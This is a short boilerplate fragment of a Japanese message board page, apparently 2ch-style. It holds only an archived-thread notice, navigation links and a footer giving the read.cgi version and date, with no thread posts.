■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)